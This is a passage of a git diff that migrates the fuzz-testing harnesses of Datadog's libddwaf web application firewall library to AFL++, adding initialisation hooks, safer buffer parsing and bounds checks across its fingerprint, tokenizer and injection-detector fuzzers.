ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create query object ddwaf_object query; ddwaf_object_map(&query); auto query_size = buffer.get(); @@ -29,6 +38,7 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) &query, key.data(), key.size(), ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create body object ddwaf_object body; ddwaf_object_map(&body); auto body_size = buffer.get(); @@ -40,17 +50,24 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) &body, key.data(), key.size(), ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create HTTP endpoint fingerprint processor http_endpoint_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{}, {}, false, buffer.get()}, {{}, {}, false, buffer.get()}, {{{}, {}, false, &query}}, {{{}, {}, false, &body}}, cache, deadline); + // Clean up ddwaf_object_free(&query); ddwaf_object_free(&body); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT( + "http_endpoint_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/http_header_fingerprint/corpus/.gitkeep b/fuzzer/http_header_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/http_header_fingerprint/src/main.cpp b/fuzzer/http_header_fingerprint/src/main.cpp index 6eaa50430..5cba69531 100644 --- a/fuzzer/http_header_fingerprint/src/main.cpp +++ b/fuzzer/http_header_fingerprint/src/main.cpp @@ -2,27 +2,37 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" +#include #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { static std::array headers{"referer", "connection", "accept-encoding", "content-encoding", "cache-control", "accept-charset", "content-type", "accept-language", "x-forwarded-for", "x-real-ip", "x-client-ip", "forwarded-for", "x-cluster-client-ip", "fastly-client-ip", "cf-connecting-ip", "cf-connecting-ipv6", "user-agent"}; - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create header object ddwaf_object header; ddwaf_object_map(&header); auto header_size = buffer.get(); @@ -39,14 +49,21 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create HTTP header fingerprint processor http_header_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{}, {}, false, &header}, cache, deadline); + // Clean up ddwaf_object_free(&header); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT( + "http_header_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/http_network_fingerprint/corpus/.gitkeep b/fuzzer/http_network_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/http_network_fingerprint/src/main.cpp b/fuzzer/http_network_fingerprint/src/main.cpp index a7c14a9b1..4a98fd5a9 100644 --- a/fuzzer/http_network_fingerprint/src/main.cpp +++ b/fuzzer/http_network_fingerprint/src/main.cpp @@ -2,26 +2,36 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" +#include #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { static std::array headers{"x-forwarded-for", "x-real-ip", "x-client-ip", "forwarded-for", "x-cluster-client-ip", "fastly-client-ip", "cf-connecting-ip", "cf-connecting-ipv6"}; - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create header object ddwaf_object header; ddwaf_object_map(&header); auto header_size = buffer.get(); @@ -38,14 +48,21 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create HTTP network fingerprint processor http_network_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{}, {}, false, &header}, cache, deadline); + // Clean up ddwaf_object_free(&header); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT( + "http_network_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/jwt_decode/src/main.cpp b/fuzzer/jwt_decode/src/main.cpp index 7ecab16d2..a46eb2e97 100644 --- a/fuzzer/jwt_decode/src/main.cpp +++ b/fuzzer/jwt_decode/src/main.cpp @@ -2,27 +2,39 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/jwt_decode.hpp" #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - ddwaf_object tmp; + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) +{ + // Create ddwaf objects + ddwaf_object tmp; ddwaf_object headers; ddwaf_object_map(&headers); + + // Add authorization header with fuzzer input ddwaf_object_map_add(&headers, "authorization", - ddwaf_object_stringl(&tmp, reinterpret_cast(bytes), size)); + ddwaf_object_stringl(&tmp, reinterpret_cast(data), size)); + // Create JWT decode processor jwt_decode gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; static const std::vector key_path{"authorization"}; @@ -30,8 +42,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) gen.eval_impl({.address = {}, .key_path = key_path, .ephemeral = false, .value = &headers}, cache, deadline); + // Clean up ddwaf_object_free(&headers); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("jwt_decode_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/lfi_detector/corpus/.gitkeep b/fuzzer/lfi_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/lfi_detector/src/main.cpp b/fuzzer/lfi_detector/src/main.cpp index c94046bfd..f649e072c 100644 --- a/fuzzer/lfi_detector/src/main.cpp +++ b/fuzzer/lfi_detector/src/main.cpp @@ -2,130 +2,65 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "condition/lfi_detector.hpp" +#include using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); - -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) -{ - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; -} - template std::vector gen_param_def(Args... addresses) { return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -// NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) -std::pair deserialize(const uint8_t *data, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto resource_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < resource_size) { - return {}; - } - - std::string_view resource{reinterpret_cast(data), resource_size}; - data += resource_size; - size -= resource_size; - - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto param_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < param_size) { - return {}; - } - - std::string_view param{reinterpret_cast(data), param_size}; - - return {resource, param}; -} - -uint8_t *serialize_string(uint8_t *Data, std::string_view str) -{ - std::size_t size = str.size(); - memcpy(Data, reinterpret_cast(&size), sizeof(std::size_t)); - Data += sizeof(std::size_t); - memcpy(Data, str.data(), size); - Data += size; - return Data; -} - -std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view param) -{ - Data = serialize_string(Data, resource); - serialize_string(Data, param); - return sizeof(std::size_t) * 2 + resource.size() + param.size(); -} -// NOLINTEND(cppcoreguidelines-pro-type-reinterpret-cast) - -// NOLINTNEXTLINE -extern "C" size_t LLVMFuzzerCustomMutator( - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) -{ - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); - - auto [resource, param] = deserialize(Data, Size); - MaxSize -= sizeof(std::size_t) * 2; - - std::string resource_buffer{resource.begin(), resource.end()}; - resource_buffer.resize(std::max(resource_buffer.size(), MaxSize / 2)); - - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - auto new_size = LLVMFuzzerMutate(reinterpret_cast(resource_buffer.data()), - resource.size(), resource_buffer.size()); - resource_buffer.resize(new_size); - - auto param_idx = rng() % new_size; - auto param_size = 1 + rng() % (new_size - param_idx); - - // std::cout << "max_size: " << MaxSize << ", new_size: " << new_size << ", idx: " << param_idx - // << ", size: " << param_size << '\n'; - auto param_buffer = resource_buffer.substr(param_idx, param_size); - return serialize(Data, resource_buffer, param_buffer); + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + // Create local file inclusion detector lfi_detector cond{{gen_param_def("server.io.fs.file", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + // Use input splitter to parse resource and param + InputSplitter splitter(data, size); + auto resource = splitter.get_string(); + auto param = splitter.get_remaining(); + // Create ddwaf objects ddwaf_object root; ddwaf_object tmp; ddwaf_object_map(&root); + + // Add filesystem file path ddwaf_object_map_add( &root, "server.io.fs.file", ddwaf_object_stringl(&tmp, resource.data(), resource.size())); + + // Add request query parameter ddwaf_object_map_add( &root, "server.request.query", ddwaf_object_stringl(&tmp, param.data(), param.size())); + // Create object store and evaluate condition object_store store; store.insert(root); ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + // Prevent compiler optimization + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("lfi_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/session_fingerprint/corpus/.gitkeep b/fuzzer/session_fingerprint/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/session_fingerprint/src/main.cpp b/fuzzer/session_fingerprint/src/main.cpp index 2b357c7f5..724e969da 100644 --- a/fuzzer/session_fingerprint/src/main.cpp +++ b/fuzzer/session_fingerprint/src/main.cpp @@ -2,22 +2,31 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "processor/fingerprint.hpp" #include -#include "common.hpp" -#include - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - random_buffer buffer{bytes, size}; + random_buffer buffer{data, size}; ddwaf_object tmp; + // Create cookies object ddwaf_object cookies; ddwaf_object_map(&cookies); auto cookies_size = buffer.get(); @@ -29,16 +38,22 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf_object_stringl(&tmp, value.data(), value.size())); } + // Create session fingerprint processor session_fingerprint gen{"id", {}, {}, false, true}; + // Execute processor processor_cache cache; ddwaf::timer deadline{2s}; auto [output, attr] = gen.eval_impl({{{}, {}, false, &cookies}}, {{{}, {}, false, buffer.get()}}, {{{}, {}, false, buffer.get()}}, cache, deadline); + // Clean up ddwaf_object_free(&cookies); ddwaf_object_free(&output); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("session_fingerprint_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/sha256/corpus/.gitkeep b/fuzzer/sha256/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/sha256/src/main.cpp b/fuzzer/sha256/src/main.cpp index 010750a7d..2b5cefaeb 100644 --- a/fuzzer/sha256/src/main.cpp +++ b/fuzzer/sha256/src/main.cpp @@ -2,24 +2,32 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "sha256.hpp" +#include -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) { return 0; } +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + // Create SHA256 hasher ddwaf::sha256_hash hasher; - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - hasher << std::string_view{reinterpret_cast(bytes), size}; - auto str = hasher.digest(); - // Force the compiler to not optimize away str - // NOLINTNEXTLINE(hicpp-no-assembler) - asm volatile("" : "+m"(str) : : "memory"); + // Process the input data + auto input_view = bytes_to_string_view(data, size); + hasher << input_view; + + // Get the digest + auto result = hasher.digest(); + + // Prevent compiler optimization + prevent_optimization(result); return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("sha256_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/fuzzer/shell_tokenizer/corpus/.gitkeep b/fuzzer/shell_tokenizer/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/shell_tokenizer/src/main.cpp b/fuzzer/shell_tokenizer/src/main.cpp index 8a1bf5211..5a218ad67 100644 --- a/fuzzer/shell_tokenizer/src/main.cpp +++ b/fuzzer/shell_tokenizer/src/main.cpp @@ -2,22 +2,29 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "tokenizer/shell.hpp" #include -#include "tokenizer/shell.hpp" +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - std::string_view query{reinterpret_cast(bytes), size}; + // Convert input to string_view for tokenization + auto query = bytes_to_string_view(data, size); + + // Create tokenizer and tokenize the input ddwaf::shell_tokenizer tokenizer(query); auto tokens = tokenizer.tokenize(); - // Force the compiler to not optimize away tokens - // NOLINTNEXTLINE(hicpp-no-assembler) - asm volatile("" : "+m"(tokens) : : "memory"); + // Prevent compiler optimization + prevent_optimization(tokens); return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("shell_tokenizer_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/fuzzer/shi_detector_array/corpus/.gitkeep b/fuzzer/shi_detector_array/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/shi_detector_array/src/main.cpp b/fuzzer/shi_detector_array/src/main.cpp index 9dd842d8b..e136d45c5 100644 --- a/fuzzer/shi_detector_array/src/main.cpp +++ b/fuzzer/shi_detector_array/src/main.cpp @@ -2,27 +2,29 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "condition/shi_detector.hpp" #include #include -#include "condition/shi_detector.hpp" - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) +template std::vector gen_param_def(Args... addresses) { - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; + return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -template std::vector gen_param_def(Args... addresses) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } // NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) @@ -33,7 +35,8 @@ std::pair, std::string_view> deserialize( return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -46,7 +49,12 @@ std::pair, std::string_view> deserialize( resource.reserve(resource_size); for (std::size_t i = 0; i < resource_size; ++i) { - const auto arg_size = *reinterpret_cast(data); + if (size < sizeof(std::size_t)) { + return {}; + } + + std::size_t arg_size; + std::memcpy(&arg_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -65,7 +73,8 @@ std::pair, std::string_view> deserialize( return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(¶m_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -181,23 +190,26 @@ extern "C" size_t LLVMFuzzerCustomMutator( return serializer{Data}.serialize(new_resource, param_buffer); } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + shi_detector cond{{gen_param_def("server.sys.shell.cmd", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + auto [resource, param] = deserialize(data, size); ddwaf_object root; ddwaf_object tmp; ddwaf_object array; ddwaf_object_map(&root); - ddwaf_object_array(&array); for (auto arg : resource) { ddwaf_object_array_add(&array, ddwaf_object_stringl(&tmp, arg.data(), arg.size())); } + // Add shell command array ddwaf_object_map_add(&root, "server.sys.shell.cmd", &array); + + // Add request query parameter ddwaf_object_map_add( &root, "server.request.query", ddwaf_object_stringl(&tmp, param.data(), param.size())); @@ -206,7 +218,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("shi_detector_array_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/shi_detector_string/corpus/.gitkeep b/fuzzer/shi_detector_string/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/shi_detector_string/src/main.cpp b/fuzzer/shi_detector_string/src/main.cpp index 07293587a..632e9c884 100644 --- a/fuzzer/shi_detector_string/src/main.cpp +++ b/fuzzer/shi_detector_string/src/main.cpp @@ -2,27 +2,30 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "condition/shi_detector.hpp" #include +#include #include -#include "condition/shi_detector.hpp" - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) +template std::vector gen_param_def(Args... addresses) { - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; + return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -template std::vector gen_param_def(Args... addresses) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } // NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) @@ -32,7 +35,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -48,7 +52,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(¶m_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -81,12 +86,18 @@ std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view extern "C" size_t LLVMFuzzerCustomMutator( // NOLINTNEXTLINE - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) + uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, unsigned int Seed) { - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); + static thread_local std::mt19937 rng; + rng.seed(Seed); auto [resource, param] = deserialize(Data, Size); + + // if deserialize failed, fall back to default mutation + if (resource.empty() && param.empty()) { + return LLVMFuzzerMutate(Data, Size, MaxSize); + } + MaxSize -= sizeof(std::size_t) * 2; std::string resource_buffer{resource.begin(), resource.end()}; @@ -97,6 +108,11 @@ extern "C" size_t LLVMFuzzerCustomMutator( resource.size(), resource_buffer.size()); resource_buffer.resize(new_size); + // avoid division by zero + if (new_size == 0) { + return LLVMFuzzerMutate(Data, Size, MaxSize); + } + auto param_idx = rng() % new_size; auto param_size = 1 + rng() % (new_size - param_idx); @@ -104,11 +120,16 @@ extern "C" size_t LLVMFuzzerCustomMutator( return serialize(Data, resource_buffer, param_buffer); } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { shi_detector cond{{gen_param_def("server.sys.shell.cmd", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + auto [resource, param] = deserialize(data, size); + + // if deserialize failed, just return (no-op for invalid input) + if (resource.empty() && param.empty()) { + return 0; + } ddwaf_object root; ddwaf_object tmp; @@ -123,7 +144,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("shi_detector_string_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/sql_tokenizer/corpus/.gitkeep b/fuzzer/sql_tokenizer/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/sql_tokenizer/src/main.cpp b/fuzzer/sql_tokenizer/src/main.cpp index b95597c4c..5daf071cf 100644 --- a/fuzzer/sql_tokenizer/src/main.cpp +++ b/fuzzer/sql_tokenizer/src/main.cpp @@ -2,55 +2,35 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "tokenizer/generic_sql.hpp" #include "tokenizer/mysql.hpp" #include "tokenizer/pgsql.hpp" -#include "tokenizer/sql_base.hpp" #include "tokenizer/sqlite.hpp" +#include -ddwaf::sql_dialect dialect = ddwaf::sql_dialect::generic; +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerInitialize(const int *argc, char ***argv) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - for (int i = 0; i < *argc; i++) { - std::string_view arg = (*argv)[i]; - if (arg.starts_with("--dialect=")) { - dialect = ddwaf::sql_dialect_from_type(arg.substr(sizeof("--dialect=") - 1)); - break; - } - } - return 0; -} + // Convert input to string_view for tokenization + auto query = bytes_to_string_view(data, size); -template [[clang::optnone]] void tokenize(std::string_view query) -{ - T tokenizer(query); - auto tokens = tokenizer.tokenize(); - // Force the compiler to not optimize away tokens - // NOLINTNEXTLINE(hicpp-no-assembler) - asm volatile("" : "+m"(tokens) : : "memory"); -} + std::vector tokens; + tokens = ddwaf::generic_sql_tokenizer(query).tokenize(); + prevent_optimization(tokens); + tokens = ddwaf::mysql_tokenizer(query).tokenize(); + prevent_optimization(tokens); + tokens = ddwaf::pgsql_tokenizer(query).tokenize(); + prevent_optimization(tokens); + tokens = ddwaf::sqlite_tokenizer(query).tokenize(); + prevent_optimization(tokens); -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) -{ - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - std::string_view query{reinterpret_cast(bytes), size}; - switch (dialect) { - case ddwaf::sql_dialect::mysql: - tokenize(query); - break; - case ddwaf::sql_dialect::pgsql: - tokenize(query); - break; - case ddwaf::sql_dialect::sqlite: - tokenize(query); - break; - default: - tokenize(query); - } return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("sql_tokenizer_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/fuzzer/sqli_detector/corpus/.gitkeep b/fuzzer/sqli_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/sqli_detector/src/main.cpp b/fuzzer/sqli_detector/src/main.cpp index f2d8a453f..f00da6557 100644 --- a/fuzzer/sqli_detector/src/main.cpp +++ b/fuzzer/sqli_detector/src/main.cpp @@ -2,146 +2,75 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "condition/sqli_detector.hpp" #include "tokenizer/sql_base.hpp" +#include using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; +// Global dialect setting ddwaf::sql_dialect dialect = ddwaf::sql_dialect::generic; -extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); - -extern "C" int LLVMFuzzerInitialize(const int *argc, char ***argv) -{ - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - - for (int i = 0; i < *argc; i++) { - std::string_view arg = (*argv)[i]; - if (arg.starts_with("--dialect=")) { - dialect = ddwaf::sql_dialect_from_type(arg.substr(sizeof("--dialect=") - 1)); - break; - } - } - return 0; -} - template std::vector gen_param_def(Args... addresses) { return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -// NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) -std::pair deserialize(const uint8_t *data, size_t size) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto resource_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= 